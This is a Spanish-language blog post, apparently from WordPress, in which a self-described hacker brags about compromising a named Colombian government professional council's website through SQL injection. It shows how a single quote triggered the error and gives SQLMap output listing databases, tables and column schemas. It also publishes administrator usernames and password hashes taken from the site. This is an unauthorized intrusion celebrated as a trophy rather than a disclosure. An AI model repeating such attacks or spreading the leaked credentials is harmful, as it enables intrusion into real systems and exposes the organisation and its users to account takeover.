Consejo Profesional de Administracion de Empresas de Colombia www.cpae.gov.co #PWN3D by r4z0r

En la Mañana de hoy 1 de junio, comenzando nuevo mes, me encuentro con un pequeño error, quizas uno de los mas comunes en las aplicaciones web de PHP, el SQL injection… esta ves la pagina web http://www.cpae.gov.co/ Consejo Profesional de Administracion de Empresas Fue en la que observe el error de SQL al colocarle la comilla simple.

entonces decidi pasar la URL donde genero el error por SQLMap para ver hasta que punto podia llegar con esta vulnerabilidad en el sitio web, como era de esperarse arrojo nombres de bases de datos:

available databases [2]:
[*] cpaegov_cpae
[*] information_schema

entonces segui por mirar las tablas de la base de datos (cpaegov_cpae)

Database: cpaegov_cpae
[19 tables]
+——————+
| Control_Usuarios |
| CuentaAmigo |
| Estadisticas |
| Frm_1 |
| Frm_2 |
| Frm_5 |
| Grupos |
| Tracking |
| Usuario |
| adcnt_conf |
| auditoria |
| base_mail |
| disposiciones |
| frm_conf |
| frm_list |
| frm_menu |
| site_web |
| tarjetasp |
| usuarios |
+——————+

como vemos ahi varias tablas que contienen datos importantes como lo son los correros, users, pass de usuarios vinculados al portal, y quizas entre esas tablas esten las que interesan mas que son los datos del webmaster o administrador :D!

bien segui ahora por orden de tablas sospechosas:

Database: cpaegov_cpae
Table: Control_Usuarios
[7 columns]
+————-+——————+
| Column | Type |
+————-+——————+
| activo | tinyint(4) |
| causal | int(10) unsigned |
| comentarios | varchar(10000) |
| fecha_mod | datetime |
| id_ctrl_uss | int(10) unsigned |
| id_uss | int(10) unsigned |
| tipo | varchar(150) |
+————-+——————+

y un muestreo de los datos de algunas de las columnas:

Database: cpaegov_cpae
Table: Control_Usuarios
[12 entries]
+——–+————-+——+——–+
| id_uss | id_ctrl_uss | tipo | activo |
+——–+————-+——+——–+
| 169 | 172 | 0 | 0 |
| 2 | 2 | 0 | 1 |
| 3 | 3 | 1 | 1 |
| 4 | 4 | 1 | 1 |
| 5 | 5 | 0 | 0 |
| 6 | 6 | 0 | 0 |
| 7 | 7 | 0 | 0 |
| 8 | 8 | 1 | 1 |
| 9 | 9 | 1 | 1 |
| 10 | 10 | 1 | 1 |
| 138 | 138 | 1 | 1 |
| 12 | 12 | 0 | 0 |
+——–+————-+——+——–+

__________

Database: cpaegov_cpae
Table: Usuario
[8 columns]
+————+————–+
| Column | Type |
+————+————–+
| Aso | smallint(6) |
| contrasena | varchar(255) |
| correo | varchar(255) |
| Exa | smallint(6) |
| grupo | int(11) |
| id_usuario | int(11) |
| Junta | smallint(6) |
| usuario | varchar(255) |
+————+————–+

y los datos de las columnas:
Database: cpaegov_cpae
Table: Usuario
[2 entries]
+————+———+————+——————————————+
| id_usuario | correo | usuario | contrasena |
+————+———+————+——————————————+
| 1 | | admincpae | e6e004f2c68891b2df1515e971517428e3c33e50 |
| 2 | | admincpae1 | af631d104bc0fdacbce4d23aae3b11b2 |
+————+———+————+——————————————+

____

Database: cpaegov_cpae
Table: usuarios
[7 columns]
+—————+—————+
| Column | Type |
+—————+—————+
| clave | text |
| correo | varchar(50) |
| fechacreacion | datetime |
| localizacion | enum(‘S’,’N’) |
| nombre | varchar(15) |
| permiso | int(1) |
| prg | int(1) |
+—————+—————+

Database: cpaegov_cpae
Table: usuarios
[2 entries]
+——————————————+———+————–+
| clave | correo | localizacion |
+——————————————+———+————–+
| 18792a1a2048765f12431a2138327ec7411ed19d | | |
| e6e004f2c68891b2df1515e971517428e3c33e50 | | |
+——————————————+———+————–+

COmo vimos, de un simple error generado por la comilla simple sacamos
bastantes datos y los que hizo falta por sacar de una manera muy simple, sencilla y rapida. 🙂 #happyhacking

@r4z0r_bl4ck
@insid30utsid3
#ColombianCyberArmy

Anuncios

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: